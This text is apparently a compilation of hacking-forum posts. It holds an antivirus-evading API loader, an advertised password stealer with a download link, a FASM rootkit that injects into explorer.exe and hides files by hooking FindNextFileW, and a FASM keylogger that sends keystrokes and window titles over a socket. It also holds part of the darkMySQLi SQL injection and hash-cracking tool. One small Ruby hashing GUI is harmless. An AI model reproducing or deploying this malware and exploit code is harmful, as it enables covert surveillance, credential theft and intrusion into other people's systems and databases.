.DataDirectory(0).VirtualAddress lVSize = lVAddress + .DataDirectory(0).Size lBase = .ImageBase End With Call CpyMem(tIMAGE_EXPORT_DIRECTORY, ByVal lVAddress, SIZE_EXPORT_DIRECTORY) Dim i As Long Dim lFunctAdd As Long Dim lNameAdd As Long Dim lNumbAdd As Long With tIMAGE_EXPORT_DIRECTORY For i = 0 To .NumberOfNames - 1 CpyMem lNameAdd, ByVal lBase + .lpAddressOfNames + i * 4, 4 If StringFromPtr(lBase + lNameAdd) = sProc Then CpyMem lNumbAdd, ByVal lBase + .lpAddressOfNameOrdinals + i * 2, 2 CpyMem lFunctAdd, ByVal lBase + .lpAddressOfFunctions + lNumbAdd * 4, 4 GetProcAddress = lFunctAdd + lBase If GetProcAddress >= lVAddress And _ GetProcAddress <= lVSize Then Call ResolveForward(GetProcAddress, lMod, sProc) If Not lMod = 0 Then GetProcAddress = GetProcAddress(lMod, sProc) Else GetProcAddress = 0 End If End If Exit Function End If Next End With End Function Private Function ResolveForward( _ ByVal lAddress As Long, _ ByRef lLib As Long, _ ByRef sMod As String) Dim sForward As String sForward = StringFromPtr(lAddress) If InStr(1, sForward, ".") Then lLib = LoadLibrary(Split(sForward, ".")(0)) sMod = Split(sForward, ".")(1) End If End Function Private Function StringFromPtr( _ ByVal lAddress As Long) As String Dim bChar As Byte Do CpyMem bChar, ByVal lAddress, 1 lAddress = lAddress + 1 If bChar = 0 Then Exit Do StringFromPtr = StringFromPtr & Chr$(bChar) Loop End Function Private Function nlfpkgnrj(ByVal sData As String) As String Dim i As Long For i = 1 To Len(sData) Step 2 nlfpkgnrj = nlfpkgnrj & Chr$(Val("&H" & Mid$(sData, i, 2))) Next i End Function That modded version uses Native APIs (Thanks Slayer ) and loads APIs on runtime... Of course, its FUD... ALL CREDITS FOR COBEIN!!! BTW, Its a class module (*.cls)

by E0N struct IMAGE_DOS_HEADER e_magic dw ? ; Magic number e_cblp dw ? ; Bytes on last page of file e_cp dw ? ; Pages in file e_crlc dw ? ; Relocations e_cparhdr dw ? ; Size of header in paragraphs e_minalloc dw ? ; Minimum extra paragraphs needed e_maxalloc dw ? ; Maximum extra paragraphs needed e_ss dw ? ; Initial (relative) SS value e_sp dw ? ; Initial SP value e_csum dw ? ; Checksum e_ip dw ? ; Initial IP value e_cs dw ? ; Initial (relative) CS value e_lfarlc dw ? ; File address of relocation table e_ovno dw ? ; Overlay number e_res0 dw ? ; Reserved words e_res1 dw ? e_res2 dw ? e_res3 dw ? e_oemid dw ? ; OEM identifier (for e_oeminfo) e_oeminfo dw ? ; OEM information; e_oemid specific e_res20 dw ? ; Reserved words e_res21 dw ? e_res22 dw ? e_res23 dw ? e_res24 dw ? e_res25 dw ? e_res26 dw ? e_res27 dw ? e_res28 dw ? e_res29 dw ? e_lfanew dd ? ; File address of new exe header ends struct IMAGE_FILE_HEADER Machine dw ? NumberOfSections dw ? TimeDateStamp dd ? PointerToSymbolTable dd ? NumberOfSymbols dd ? SizeOfOptionalHeader dw ? characteristics dw ? ends struct IMAGE_DATA_DIRECTORY VirtualAddress dd ? Size dd ? ends struct IMAGE_OPTIONAL_HEADER ; Standard fields. Magic dw ? MajorLinkerVersion db ? MinorLinkerVersion db ? SizeOfCode dd ? SizeOfInitializedData dd ? SizeOfUnitializedData dd ? AddressOfEntryPoint dd ? BaseOfCode dd ? BaseOfData dd ? ; NT additional fields. ImageBase dd ? SectionAlignment dd ? FileAlignment dd ? MajorOperatingSystemVersion dw ? MinorOperatingSystemVersion dw ? MajorImageVersion dw ? MinorImageVersion dw ? MajorSubsystemVersion dw ? MinorSubsystemVersion dw ? W32VersionValue dd ? SizeOfImage dd ? SizeOfHeaders dd ? CheckSum dd ? SubSystem dw ? DllCharacteristics dw ? SizeOfStackReserve dd ? SizeOfStackCommit dd ? SizeOfHeapReserve dd ? SizeOfHeapCommit dd ? LoaderFlags dd ? NumberOfRvaAndSizes dd ? DataDirectory1 IMAGE_DATA_DIRECTORY ? DataDirectory2 IMAGE_DATA_DIRECTORY ? DataDirectory3 IMAGE_DATA_DIRECTORY ? DataDirectory4 IMAGE_DATA_DIRECTORY ? DataDirectory5 IMAGE_DATA_DIRECTORY ? DataDirectory6 IMAGE_DATA_DIRECTORY ? DataDirectory7 IMAGE_DATA_DIRECTORY ? DataDirectory8 IMAGE_DATA_DIRECTORY ? DataDirectory9 IMAGE_DATA_DIRECTORY ? DataDirectory10 IMAGE_DATA_DIRECTORY ? DataDirectory11 IMAGE_DATA_DIRECTORY ? DataDirectory12 IMAGE_DATA_DIRECTORY ? DataDirectory13 IMAGE_DATA_DIRECTORY ? DataDirectory14 IMAGE_DATA_DIRECTORY ? DataDirectory15 IMAGE_DATA_DIRECTORY ? DataDirectory16 IMAGE_DATA_DIRECTORY ? ends struct IMAGE_NT_HEADERS Signature dd ? FileHeader IMAGE_FILE_HEADER ? OptionalHeader IMAGE_OPTIONAL_HEADER ? ends

by Exidous [info] Gets IE7, IE8 (Note: Small bug in IE8 Only gets 1 Password.. Will be fixed soon), Firefox 3.X, msn, few game serial keys, windows key, Pc Information, Pidgin, Yahoo, Trillian, and steam! (Still Adding More In!!!) (Soon, Get logs: MSN, Skype, Aol, and ICQ.. Maby trillian idk yet) (Pro Version: Skype Spread, MSN Spread, P2P Spread, USB Spread, Bypass XP Firewall, and Bypass UAC.) Screenshots: Note this is the public version, I will soon have private copys for sale! Also, This is first release.. Please Report Bugs.. ALL THE SPREADING AND BYPASS FEATURES ARE DISABLED IN FREE VERSION! Download: http://www.2shared.com/file/7111098/7fd6afa2/ZH_Stealer_Public_V01.html

Credit to protos the autor of this code require 'digest/md5' require 'digest/sha1' require 'base64' require 'tk' root= TkRoot.new() {title "Encripter By pRotos"} TkLabel.new(root) { text "Palabra a Encriptar" pack { padx 20 ; pady 20; side 'top' } } palabra = TkVariable.new() TkEntry.new(root) { textvariable(palabra) pack() } TkLabel.new(root) { text " MD5" pack ("side"=>"bottom") } md5 = TkText.new(root) { width 25; height 2 }.pack("side"=>"bottom") TkLabel.new(root) { text "SHA1" pack ('side'=> 'bottom') } sha = TkText.new(root) { width 25; height 2 }.pack("side"=>"bottom") TkLabel.new(root) { text "Base64" pack ( 'side'=> 'bottom' ) } b64 = TkText.new(root) { width 25; height 2 }.pack("side"=>"bottom") TkButton.new(root) { text " Encripta" command proc { amd5 = Digest::MD5.hexdigest(palabra.value) asha1 = Digest::SHA1.hexdigest(palabra.value) ab64 = Base64.encode64(palabra.value) puts " _MD5_", amd5 puts " _SHA1_", asha1 puts " _Base64_", ab64 md5.insert('end', amd5) sha.insert('end', asha1) b64.insert('end', ab64) } pack("side"=>"top") } TkButton.new(root) { text " Clear " command proc { md5.clear sha.clear b64.clear } pack("side"=>"bottom") } Tk.mainloop()

;------------------------------------------------------------------------------------------------- ; RootKit por Hacker_Zero & YST ; RootKit sin dll que Hookea FindNextFileW en explorer ocultando los archivos que ;comiencen por '#' ;------------------------------------------------------------------------------------------------- include 'C:\fasm\include\win32ax.inc' .code proc start locals ProcessName db "explorer.exe",0 endl stdcall Inyectar,addr ProcessName,FINFuncion-FuncionInyectada,FuncionInyectada,[GetProcAddress] cmp eax,-1 jne salir invoke MessageBoxA,0,"No se encontró el proceso!",0,0 salir: invoke ExitProcess,0 endp proc Inyectar,ProcessName,Tamaño,Funcion,Datos locals struct PROCESSENTRY32 dwSize dd ? cntUsage dd ? th32ProcessID dd ? th32DefaultHeapID dd ? th32ModuleID dd ? cntThreads dd ? th32ParentProcessID dd ? pcPriClassBase dd ? dwFlags dd ? szExeFile rb MAX_PATH ends pInfo PROCESSENTRY32 ? Handle dd ? PID dd ? DirFuncion dd ? hProcess dd ? endl pushad ;Obtenemos el PID del proceso invoke CreateToolhelp32Snapshot,0x00000002,0 mov [Handle],eax mov eax,sizeof.PROCESSENTRY32 mov [pInfo.dwSize], eax BuclePid: invoke Process32Next,[Handle],addr pInfo cmp eax,0 je FinProcBuclePID ;No hay más procesos invoke lstrcmp,addr pInfo.szExeFile,[ProcessName] cmp eax,0 jne BuclePid jmp FinBuclePid FinProcBuclePID: invoke CloseHandle,[Handle] popad mov eax,-1 ret FinBuclePid: invoke CloseHandle,[Handle] push [pInfo.th32ProcessID] pop [PID] ;Lazamos el proceso invoke OpenProcess,PROCESS_CREATE_THREAD+PROCESS_VM_OPERATION+PROCESS_VM_WRITE,FALSE,[PID] mov [hProcess],eax ;Reservamos espacio en el proceso invoke VirtualAllocEx,[hProcess],0,[Tamaño],MEM_COMMIT+MEM_RESERVE,PAGE_EXECUTE_READWRITE mov [DirFuncion],eax ;Escribimos los datos en memoria invoke WriteProcessMemory,[hProcess],[DirFuncion],[Funcion],[Tamaño],0 ;Creamos el hilo invoke CreateRemoteThread,[hProcess],0,0,[DirFuncion],[Datos],0,0 popad mov eax,1 ret endp proc FuncionInyectada,pGetProcAddress locals BaseKernel32 dd ? OriginalProtection dd ? endl ;Leemos el PEB para obtener la base de KERNEL32.DLL xor eax, eax add eax,[fs:eax+30h] mov eax, [eax + 0ch] mov esi, [eax + 1ch] lodsd mov eax, [eax + 08h] mov [BaseKernel32],eax ;Obtenemos la dirección de FindNextFileA stdcall [pGetProcAddress],[BaseKernel32],'FindNextFileW' mov ebx,eax stdcall [pGetProcAddress],[BaseKernel32],"VirtualProtect" stdcall eax,ebx,7,PAGE_EXECUTE_READWRITE,addr OriginalProtection ;Calculamos el delta offset call delta delta: pop edx sub edx,delta ;edx=delta ;Lo guardamos en la pila push edx ;Guardamos la dirección de FindNextFileW en la variable dirFindNextFileW add edx,dirFindNextFileW mov dword[edx],ebx pop edx mov ecx,edx add ecx,ApiOriginal mov al,byte[ebx] mov byte[ecx],al mov byte[ebx],0xE9 ;0xE9=jmp inc ebx inc ecx mov eax,dword[ebx] mov dword[ecx],eax mov eax,FuncionHook add eax,edx sub eax,ebx sub eax,4 mov dword[ebx],eax ;la dirección a la que saltará add ebx,4 add ecx,4 mov ax,word[ebx] mov word[ecx],ax mov word[ebx],0x9090 ret ;Terminamos, ya hemos modificado el principio de la api, ;cuando el programa llame a FindNextFileW, saltará a FuncionHook ;-------------------------------------------------------------------------------------------------------------------------------------------- ;Contiene los 7 primeros bytes de la Api FindNextFileW y una rutina para saltar a MessageBox+7 ApiOriginal: ;edx=delta ;7 nops que cambiaremos en tiempo de ejecución por los 7 primeros bytes de FindNextFileW nop nop nop nop nop nop nop add edx,dirFindNextFileW ;Obtenemos la dirección de FindNextFileW leyendo mov eax,dword[edx] ;la variable dirFindNextFileW y la guardamos en eax add eax,7 ;Nos desplazamos 7 bytes jmp eax ;Saltamos a FindNextFileW+7 ;-------------------------------------------------------------------------------------------------------------------------------------------- ;Función a la que salta el programa cuando se llama a la API hookeada proc FuncionHook,hFindFile,lpFindFileData Volver: ;Obtenemos el delta offset call delta2 delta2: pop edx sub edx,delta2 ;Llamamos a nuestro buffer push [lpFindFileData] push [hFindFile] mov ecx,edx add ecx,ApiOriginal call ecx cmp eax,0 je Retornar mov ebx,[lpFindFileData] add ebx,44 cmp byte[ebx],'#' jne Retornar jmp Volver Retornar: ret endp ;------------------------------------------------------------------------------------------------------------------------------------------- dirFindNextFileW dd ? endp FINFuncion: .end start

include 'C:\fasm\include\win32ax.inc' .data IP db '127.0.0.1',0 nArch db '\Logdrive.dll',0 nFile db '\Regdrive.exe',0 WinPath dd ? Espacio db '\n',0 saltolinea db 13,10,0 hVentana dd ? Rev dd ? ThreadID dd ? hHook dd ? hSock dd ? hArch dd ? hKey dd ? MyPath dd ? ifSock dd 0 fSize dd ? dLeidos dd ? Buffer dd ? regdisposition dd ? regSubKey db "SOFTWARE\Microsoft\Windows\CurrentVersion\Run",0 .code start: ;Creamos un nuevo hilo para el Hook invoke CreateThread,0,4096,Hookear,0,0,[ThreadID] ;Damos tamaño a los registros invoke GlobalAlloc,GPTR,1024h push eax eax eax pop esi ebx edx ;Conexion invoke WSAStartup,200,eax invoke socket,AF_INET,SOCK_STREAM,0 push eax pop [hSock] ;Esi Contiene el Handle de socket mov word[ebx],2 invoke htons,2000 mov word[ebx],2 mov word[ebx+2], AX invoke gethostbyname,IP add eax,32 invoke inet_addr,eax mov dword[ebx+4],eax .BucleConectar: invoke connect,[hSock],ebx,16 cmp eax, 0xFFFFFFFF JE .BucleConectar .BucleRecivir: invoke GlobalAlloc,GPTR,1024h push eax invoke recv,[hSock],eax,1023h,0 mov [Rev],eax pop eax cmp [Rev],0 jng revisar .if dword[eax] = '$Go' mov [ifSock],1 .endif .if dword[eax] = '$Sp' mov [ifSock],0 .endif revisar: cmp [Rev], 0 jne start.BucleRecivir .reiniciar: stdcall dword[closesocket],[hSock] stdcall dword[WSACleanup] jmp start .end start ;Lanzamos el Hook desde un nuevo hilo proc Hookear xor ebx,ebx invoke GetModuleHandleA,ebx invoke SetWindowsHookExA,13,KeyboardHook,eax,ebx mov [hHook],eax invoke GetMessageA,ebx,ebx,ebx,ebx invoke UnhookWindowsHookEx,[hHook] endp ;Proc del Hook donde se detectará la tecla pulsada proc KeyboardHook,nCode,wParam,lParam mov eax,[wParam] cmp eax,WM_KEYDOWN jne siguienteHook mov eax,[lParam] cmp byte[eax],VK_CAPITAL je siguienteHook cmp byte[eax],VK_LSHIFT je siguienteHook cmp byte[eax],VK_RSHIFT je siguienteHook .if byte[eax]=VK_RETURN stdcall EnviarDatos,Espacio jmp siguienteHook .endif .if byte[eax]=VK_BACK stdcall ProcesarTecla,"{BACK}" jmp siguienteHook .endif .if byte[eax]=VK_ESCAPE stdcall ProcesarTecla,"{ESC}" jmp siguienteHook .endif .if byte[eax]=VK_TAB stdcall ProcesarTecla,"{TAB}" jmp siguienteHook .endif .if byte[eax]=VK_LCONTROL stdcall ProcesarTecla,"{CTRL}" jmp siguienteHook .endif .if byte[eax]=VK_RCONTROL stdcall ProcesarTecla,"{CTRL}" jmp siguienteHook .endif .if byte[eax]=VK_RMENU stdcall ProcesarTecla,"{ALT}" jmp siguienteHook .endif .if byte[eax]=VK_LMENU stdcall ProcesarTecla,"{ALT}" jmp siguienteHook .endif .if byte[eax]=VK_SPACE stdcall ProcesarTecla," " jmp siguienteHook .endif .if byte[eax]=VK_DELETE stdcall ProcesarTecla,"{DEL}" jmp siguienteHook .endif .if byte[eax]=VK_RWIN stdcall ProcesarTecla,"{WIN}" jmp siguienteHook .endif .if byte[eax]=VK_LWIN stdcall ProcesarTecla,"{WIN}" jmp siguienteHook .endif .if byte[eax]=VK_F1 stdcall ProcesarTecla,"{F1}" jmp siguienteHook .endif .if byte[eax]=VK_F2 stdcall ProcesarTecla,"{F2}" jmp siguienteHook .endif .if byte[eax]=VK_F3 stdcall ProcesarTecla,"{F3}" jmp siguienteHook .endif .if byte[eax]=VK_F4 stdcall ProcesarTecla,"{F4}" jmp siguienteHook .endif .if byte[eax]=VK_F5 stdcall ProcesarTecla,"{F5}" jmp siguienteHook .endif .if byte[eax]=VK_F6 stdcall ProcesarTecla,"{F6}" jmp siguienteHook .endif .if byte[eax]=VK_F7 stdcall ProcesarTecla,"{F7}" jmp siguienteHook .endif .if byte[eax]=VK_F8 stdcall ProcesarTecla,"{F8}" jmp siguienteHook .endif .if byte[eax]=VK_F9 stdcall ProcesarTecla,"{F9}" jmp siguienteHook .endif .if byte[eax]=VK_F10 stdcall ProcesarTecla,"{F10}" jmp siguienteHook .endif .if byte[eax]=VK_F11 stdcall ProcesarTecla,"{F11}" jmp siguienteHook .endif .if byte[eax]=VK_F12 stdcall ProcesarTecla,"{F12}" jmp siguienteHook .endif .if byte[eax]=0xBA stdcall isShift cmp ecx,1 je NoBA stdcall ProcesarTecla,"^" jmp siguienteHook NoBA: stdcall ProcesarTecla,"`" jmp siguienteHook .endif .if byte[eax]=0xBB stdcall isShift cmp ecx,1 je NoBB stdcall ProcesarTecla,"*" jmp siguienteHook NoBB: stdcall ProcesarTecla,"+" jmp siguienteHook .endif .if byte[eax]=0xBC stdcall isShift cmp ecx,1 je NoBC stdcall ProcesarTecla,";" jmp siguienteHook NoBC: stdcall ProcesarTecla,"," jmp siguienteHook .endif .if byte[eax]=0xBD stdcall isShift cmp ecx,1 je NoBD stdcall ProcesarTecla,"_" jmp siguienteHook NoBD: stdcall ProcesarTecla,"-" jmp siguienteHook .endif .if byte[eax]=0xBE stdcall isShift cmp ecx,1 je NoBE stdcall ProcesarTecla,":" jmp siguienteHook NoBE: stdcall ProcesarTecla,"." jmp siguienteHook .endif .if byte[eax]=0xBF stdcall isShift cmp ecx,1 je NoBF stdcall ProcesarTecla,"Ç" jmp siguienteHook NoBF: stdcall ProcesarTecla,"ç" jmp siguienteHook .endif .if byte[eax]=0xC0 stdcall isShift cmp ecx,1 je NoC0 stdcall ProcesarTecla,"Ñ" jmp siguienteHook NoC0: stdcall ProcesarTecla,"ñ" jmp siguienteHook .endif .if byte[eax]=0xDB stdcall isShift cmp ecx,1 je NoDB stdcall ProcesarTecla,"?" jmp siguienteHook NoDB: stdcall ProcesarTecla,"'" jmp siguienteHook .endif .if byte[eax]=0xDC stdcall isShift cmp ecx,1 je NoDC stdcall ProcesarTecla,"ª" jmp siguienteHook NoDC: stdcall ProcesarTecla,"º" jmp siguienteHook .endif .if byte[eax]=0xDD stdcall isShift cmp ecx,1 je NoDD stdcall ProcesarTecla,"¿" jmp siguienteHook NoDD: stdcall ProcesarTecla,"¡" jmp siguienteHook .endif .if byte[eax]=0xDE stdcall isShift cmp ecx,1 je NoDE stdcall ProcesarTecla,"¨" jmp siguienteHook NoDE: stdcall ProcesarTecla,"´" jmp siguienteHook .endif .if byte[eax]=0x30 stdcall isShift cmp ecx,1 je No0 stdcall ProcesarTecla,"=" jmp siguienteHook No0: stdcall ProcesarTecla,"0" jmp siguienteHook .endif .if byte[eax]=0x31 stdcall isShift cmp ecx,1 je No1 stdcall ProcesarTecla,"!" jmp siguienteHook No1: stdcall ProcesarTecla,"1" jmp siguienteHook .endif .if byte[eax]=0x32 stdcall isShift cmp ecx,1 je No2 stdcall ProcesarTecla,'"' jmp siguienteHook No2: stdcall ProcesarTecla,"2" jmp siguienteHook .endif .if byte[eax]=0x33 stdcall isShift cmp ecx,1 je No3 stdcall ProcesarTecla,"·" jmp siguienteHook No3: stdcall ProcesarTecla,"3" jmp siguienteHook .endif .if byte[eax]=0x34 stdcall isShift cmp ecx,1 je No4 stdcall ProcesarTecla,"$" jmp siguienteHook No4: stdcall ProcesarTecla,"4" jmp siguienteHook .endif .if byte[eax]=0x35 stdcall isShift cmp ecx,1 je No5 stdcall ProcesarTecla,"%" jmp siguienteHook No5: stdcall ProcesarTecla,"5" jmp siguienteHook .endif .if byte[eax]=0x36 stdcall isShift cmp ecx,1 je No6 stdcall ProcesarTecla,"&" jmp siguienteHook No6: stdcall ProcesarTecla,"6" jmp siguienteHook .endif .if byte[eax]=0x37 stdcall isShift cmp ecx,1 je No7 stdcall ProcesarTecla,"/" jmp siguienteHook No7: stdcall ProcesarTecla,"7" jmp siguienteHook .endif .if byte[eax]=0x38 stdcall isShift cmp ecx,1 je No8 stdcall ProcesarTecla,"(" jmp siguienteHook No8: stdcall ProcesarTecla,"8" jmp siguienteHook .endif .if byte[eax]=0x39 stdcall isShift cmp ecx,1 je No9 stdcall ProcesarTecla,")" jmp siguienteHook No9: stdcall ProcesarTecla,"9" jmp siguienteHook .endif .if byte[eax]=VK_NUMPAD0 stdcall ProcesarTecla,"0" jmp siguienteHook .endif .if byte[eax]=VK_NUMPAD1 stdcall ProcesarTecla,"1" jmp siguienteHook .endif .if byte[eax]=VK_NUMPAD2 stdcall ProcesarTecla,"2" jmp siguienteHook .endif .if byte[eax]=VK_NUMPAD3 stdcall ProcesarTecla,"3" jmp siguienteHook .endif .if byte[eax]=VK_NUMPAD4 stdcall ProcesarTecla,"4" jmp siguienteHook .endif .if byte[eax]=VK_NUMPAD5 stdcall ProcesarTecla,"5" jmp siguienteHook .endif .if byte[eax]=VK_NUMPAD6 stdcall ProcesarTecla,"6" jmp siguienteHook .endif .if byte[eax]=VK_NUMPAD7 stdcall ProcesarTecla,"7" jmp siguienteHook .endif .if byte[eax]=VK_NUMPAD8 stdcall ProcesarTecla,"8" jmp siguienteHook .endif cmp byte[eax],65 ;VK_A jl siguienteHook cmp byte[eax],90 ;VK_Z jg siguienteHook ;Letras A-Z stdcall isShift cmp ecx,1 jne listo mov eax,[lParam] add byte[eax],32 listo: stdcall ProcesarTecla,eax siguienteHook: invoke CallNextHookEx,[hHook],[nCode],[wParam],[lParam] ret endp proc ProcesarTecla,tecla ; Procesa la tecla capturada ;cmp [ifSock],1 ;je sEnviar ;sGuardar: ;invoke GetWindowsDirectory,WinPath,1024 ;invoke lstrcat,WinPath,nArch ;invoke CreateFile,WinPath,GENERIC_READ,0,0,OPEN_ALWAYS,0,0 ;mov [hArch],eax ;invoke GetFileSize, [hArch],NULL ;mov [fSize],eax ;invoke LocalAlloc, LPTR,[fSize] ;mov [Buffer],eax ;invoke ReadFile,[hArch],[Buffer],[fSize],dLeidos,NULL ;invoke CloseHandle,[hArch] ;invoke lstrcat,[Buffer],[tecla] ;invoke CreateFile,WinPath,GENERIC_WRITE,0,0,CREATE_ALWAYS,0,0 ;invoke lstrlen,[Buffer] ;invoke WriteFile,[hArch],[Buffer],eax,dLeidos,NULL ;invoke CloseHandle,[hArch] ;ret sEnviar: invoke GetForegroundWindow cmp eax,[hVentana] je enviartecla mov [hVentana],eax invoke GlobalAlloc,GPTR,256 push eax invoke GetWindowText,[hVentana],eax,256 pop eax mov ebx,eax stdcall EnviarDatos,Espacio stdcall EnviarDatos,Espacio stdcall EnviarDatos,ebx stdcall EnviarDatos,Espacio enviartecla: stdcall EnviarDatos,[tecla] ret endp proc EnviarDatos,datos invoke lstrlen,[datos] invoke send,[hSock],[datos],eax,0 ret endp ;Función para obtener el estado de las mayúsculas proc isShift invoke GetKeyState,VK_CAPITAL cmp eax,1 jl pulsada jmp nopulsada pulsada: invoke GetKeyState,VK_SHIFT cmp eax,1 jg noShift jmp siShift nopulsada: invoke GetKeyState,VK_SHIFT cmp eax,1 jg siShift jmp noShift siShift: ; Retornamos 0 si está mayúscula, 1 si no mov ecx,1 ret noShift: mov ecx,0 ret endp

# *union injection # *blind injection # *post and get method injection ** POST not working yet # *full information_schema enumeration # *table and column fuzzer # *database information extractor # *column length finder # *load_file fuzzer # *general info gathering # *MySQL hash cracker #!/usr/bin/python # 1/30/09 ################################################################ # .___ __ _______ .___ # # __| _/____ _______| | __ ____ \ _ \ __| _/____ # # / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ # # / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ # # \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ # # \/ \/ \/ # # ___________ ______ _ __ # # _/ ___\_ __ \_/ __ \ \/ \/ / # # \ \___| | \/\ ___/\ / # # \___ >__| \___ >\/\_/ # # est.2007 \/ \/ forum.darkc0de.com # ################################################################ # Multi-Purpose MySQL Injection Tool # FUNCTIONS # *union injection # *blind injection # *post and get method injection ** POST not working yet # *full information_schema enumeration # *table and column fuzzer # *database information extractor # *column length finder # *load_file fuzzer # *general info gathering # *MySQL hash cracker # FEATURES # *Round Robin Proxy w/ a proxy list (non-auth or auth proxies) # *Proxy Auth (works great with Squid w/ basic auth) # *Random browser agent chosen everytime the script runs # *debug mode for seeing every URL request, proxy used, browser agent used # Share the c0de! (f*ck Windows! Get a real OS!) # darkc0de Crew # www.darkc0de.com # rsauron[at]gmail[dot]com # Greetz to # d3hydr8, Tarsian, c0mrade (r.i.p brotha), reverenddigitalx, rechemen # and the darkc0de crew # This was written for educational purpose only. Use it at your own risk. # Author will be not responsible for any damage! # Intended for authorized Web Application Pen Testing! # CHANGES # 1.6 ADDED --end evasion setting # 1.5 Fixed --strart now starts at correct number instead of +1 # 1.4 Fixed schema mode when a table was specified - app would hand after last column # 1.3 Fixed Regular Expression Search in dump mode (should fixs issues of crazy html code when dumping) # 1.2 Fixed mode findcol - the way it replaced darkc0de in the output URL string # BE WARNED, THIS TOOL IS VERY LOUD.. import urllib, sys, re, os, socket, httplib, urllib2, time, random ##Set default evasion options here arg_end = "--" # examples "--", "/*", "#", "%00", "--&SESSIONID=00hn3gvs21lu5ke2f03bxr" <-- if you need vars after inj point arg_eva = "+" # examples "/**/" ,"+", "%20" ## colMax variable for column Finder colMax = 200 ## Set the default timeout value for requests socket.setdefaulttimeout(10) ## Default Log File Name logfile = "darkMySQLi.log" ## File Location to fuzz with for TABLE fuzzer tablefuzz = "tablesfuzz.txt" ## File Location to fuzz with for COLUMN fuzzer columnfuzz = "columnsfuzz.txt" ## File Location to fuzz with for LOAD_FILE fuzzer loadfilefuzz = "loadfilefuzz.txt" ## Agents agents = ["Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)", "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)", "Microsoft Internet Explorer/4.0b1 (Windows 95)", "Opera/8.00 (Windows NT 5.1; U; en)"] #URL Get Function def GetThatShit(head_URL): source = "" global gets;global proxy_num head_URL = head_URL.replace("+",arg_eva) request_web = urllib2.Request(head_URL) request_web.add_header('User-Agent',agent) while len(source) < 1: if arg_debug == "on": print "\n[proxy]:",proxy_list_count[proxy_num % proxy_len]+"\n[agent]:",agent+"\n[debug]:",head_URL,"\n" try: gets+=1;proxy_num+=1 source = proxy_list[proxy_num % proxy_len].open(request_web).read() except (KeyboardInterrupt, SystemExit): raise except (urllib2.HTTPError): print "[-] Unexpected error:", sys.exc_info()[0],"\n[-] Trying again!" print "[proxy]:",proxy_list_count[proxy_num % proxy_len]+"\n[agent]:",agent+"\n[debug]:",head_URL,"\n" break except: print "[-] Unexpected error:", sys.exc_info()[0],"\n[-] Look at the error and try to figure it out!" print "[proxy]:",proxy_list_count[proxy_num % proxy_len]+"\n[agent]:",agent+"\n[debug]:",head_URL,"\n" raise return source #the guts and glory - Binary Algorithim that does all the guessing for the Blind Methodology def GuessValue(URL): lower = lower_bound;upper = upper_bound while lower < upper: try: mid = (lower + upper) / 2 head_URL = URL + ">"+str(mid) source = GetThatShit(head_URL) match = re.findall(arg_string,source) if len(match) >= 1: lower = mid + 1 else: upper = mid except (KeyboardInterrupt, SystemExit): raise except: pass if lower > lower_bound and lower < upper_bound: value = lower else: head_URL = URL + "="+str(lower) source = GetThatShit(head_URL) match = re.findall(arg_string,source) if len(match) >= 1: value = lower else: value = 63 print "Could not find the ascii character! There must be a problem.." print "Check to make sure your using the my script right!" print "READ xprog's blind sql tutorial!\n" sys.exit(1) return value ## Functions for MySQL5 hash cracking --- THANKS d3hydr8 def c1(word): s = hashlib.sha1() s.update(word[:-1]) s2 = hashlib.sha1() s2.update(s.digest()) return s2.hexdigest() def c2(word): s = sha.new() s.update(word[:-1]) s2 = sha.new() s2.update(s.digest()) return s2.hexdigest() ## Funtion for MySQL323 hash cracking def mysql323(clear): # Taken almost verbatim from mysql's source nr = 1345345333 add = 7 nr2 = 0x12345671 retval = "" for c in clear: if c == ' ' or c == '\t': continue tmp = ord(c) nr ^= (((nr & 63) + add) * tmp) + (nr << 8) nr2 += (nr2 << 8) ^ nr add += tmp res1 = nr & ((1 << 31) - 1) res2 = nr2 & ((1 << 31) - 1) return "%08lx%08lx" % (res1, res2) #say hello if len(sys.argv) <= 1: print "\n|--------------------------------------------------|" print "| rsauron@gmail.com v1.6 |" print "| 1/2009 darkMySQLi.py |" print "| -- Multi Purpose MySQL Injection Tool -- |" print "| Usage: darkMySQLi.py [options] |" print "| -h help darkc0de.com |" print "|--------------------------------------------------|\n" sys.exit(1) #help option for arg in sys.argv: if arg == "-h" or arg == "--help": print "\n darkMySQLi v1.6 rsauron@gmail.com" print " forum.darkc0de.com" print "Usage: ./darkMySQLi.py [options]" print "Options:" print " -h, --help shows this help message and exits" print " -d, --debug display URL debug information\n" print " Target:" print " -u URL, --url=URL Target url\n" print " Methodology:" print " -b, --blind Use blind methodology (req: --string)" print " -s, --string String to match in page when the query is valid" print " Method:" print " --method=PUT Select to use PUT method ** NOT WORKING" print " Modes:" print " --dbs Enumerate databases MySQL v5+" print " --schema Enumerate Information_schema (req: -D," print " opt: -T) MySQL v5+" print " --full Enumerate all we can MySQL v5+" print " --info MySQL Server configuration MySQL v4+" print " --fuzz Fuzz Tables & Columns Names MySQL v4+" print " --findcol Find Column length MySQL v4+" print " --dump Dump database table entries (req: -T," print " opt: -D, -C, --start) MySQL v4+" print " --crack=HASH Crack MySQL Hashs (req: --wordlist)" print " --wordlist=LIS.TXT Wordlist to be used for cracking" print " Define:" print " -D DB database to enumerate" print " -T TBL database table to enumerate" print " -C COL database table column to enumerate" print " Optional:" print " --ssl To use SSL" print " --end To use + and -- for the URLS --end \"--\" (Default)" print " To use /**/ and /* for the URLS --end \"/*\"" print " --rowdisp Do not display row # when dumping" print " --start=ROW Row number to begin dumping at" print " --where=COL,VALUE Use a where clause in your dump" print " --orderby=COL Use a orderby clause in your dump" print " --cookie=FILE.TXT Use a Mozilla cookie file" print " --proxy=PROXY Use a HTTP proxy to connect to the target url" print " --output=FILE.TXT Output results of tool to this file\n" sys.exit(1) #define variables site = "" proxy = "None" arg_string = "" arg_blind = "--union" arg_table = "None" arg_database = "None" arg_columns = "None" arg_row = "Rows" arg_cookie = "None" arg_insert = "None" arg_where = "" arg_orderby = "" arg_debug = "off" arg_rowdisp = 1 arg_adminusers = 10 arg_wordlist = "" arg_ssl = "off" arg_proxy_auth = "" darkc0de = "concat(0x1e,0x1e," mode = "None" lower_bound = 0 upper_bound = 16069 line_URL = "" count_URL = "" cur_db = "" cur_table = "" terminal = "" count = 0 gets = 0 table_num = 0 num = 0 ser_ver = 3 version =[] let_pos = 1 